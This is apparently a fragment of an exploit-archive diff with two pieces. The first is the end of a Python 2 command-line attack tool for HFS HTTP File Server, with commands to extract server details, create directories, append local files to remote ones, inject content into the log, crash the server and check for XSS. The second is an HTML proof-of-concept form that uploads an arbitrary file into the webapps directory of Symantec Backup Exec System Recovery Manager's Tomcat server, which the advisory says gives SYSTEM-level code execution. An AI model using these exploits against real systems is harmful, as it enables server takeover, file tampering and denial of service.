globals()["banner"] = 'HFS '+idver+' '+idbuild
showacceptedcmds()
def result(s):
cmd = s.split()
if len(cmd) > 0:
curcmd = cmd[0]
result = 'Invalid command. Type "help" for list of commands.'
if curcmd == 'open':
procparams(cmd)
if ishostavailable():
showver()
result = 'Connected.\n'
else:
result = msg_fail
elif curcmd == 'symbols':
if ishostavailable():
showver()
print 'Forcing HFS to reveal more details...'
getallservinf()
result = msg_done
elif curcmd == 'ver':
if ishostavailable():
showver()
result = msg_done
elif curcmd == 'mkd':
if len(cmd) > 1:
if cmd[1] != []:
hfsmkdir(cmd[1])
result = msg_done
else:
result = msg_par_mis
elif curcmd == 'manipf':
if len(cmd) > 2:
try:
localfilecontent = readlocalfile(cmd[1])
except Exception, msg:
result = msg_acc_file,msg
else:
localfilecontent = localfilecontent.replace("\n","%0a")
hfsappendtofile(cmd[2],localfilecontent)
result = msg_done
else:
result = msg_par_mis
elif curcmd == 'maniplog':
if len(cmd) > 1:
try:
localfilecontent = readlocalfile(cmd[1])
except Exception, msg:
result = msg_acc_file,msg
else:
hfsinjecttolog(localfilecontent)
result = msg_done
else:
result = msg_par_mis
elif curcmd == 'checkdos':
shutdownhfs()
result = msg_done
elif curcmd == 'checkxss':
result = checkxss()
elif curcmd == 'help':
result = help
elif curcmd == 'readme':
result = readme
elif curcmd == 'quit':
result = 'Bye!'
return result
else:
return msg_help
print about
s = ""
while s != "quit":
try: s = raw_input(">")
except EOFError:
s = "quit"
print s
print result(s)

23
platforms/windows/remote/31072.html Executable file
View file

@ -0,0 +1,23 @@
source: http://www.securityfocus.com/bid/27487/info
Symantec Backup Exec System Recovery Manager is prone to a vulnerability that allows arbitrary unauthorized files to be uploaded to any location on the affected server.
This issue resides in the Symantec LiveState Apache Tomcat server. Attackers can leverage it to execute arbitrary code with SYSTEM-level privileges and completely compromise affected computers.
<?xml version="1.0"?>
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>File Upload POC</title></head>
<body>
<h2> Backup Exec System Recovery Manager 7.0<br>File Upload POC</h2>
<form action="https://www.example.com:8443/axis/FileUpload" method="post"
enctype="multipart/form-data">
Remote Path: <input name="path" size="100" type="text"
value="C:\Program Files\Symantec\Backup Exec System
Recovery\Manager\Services\tomcat\WebApps\axis"/><br/>
File to upload: <input name="log_file" type="file"/><br/>
<hr/>
<p><input type="submit"/><input type="reset"/></p>
</form>
(c)BastardLabs 2008.
</body>
</html>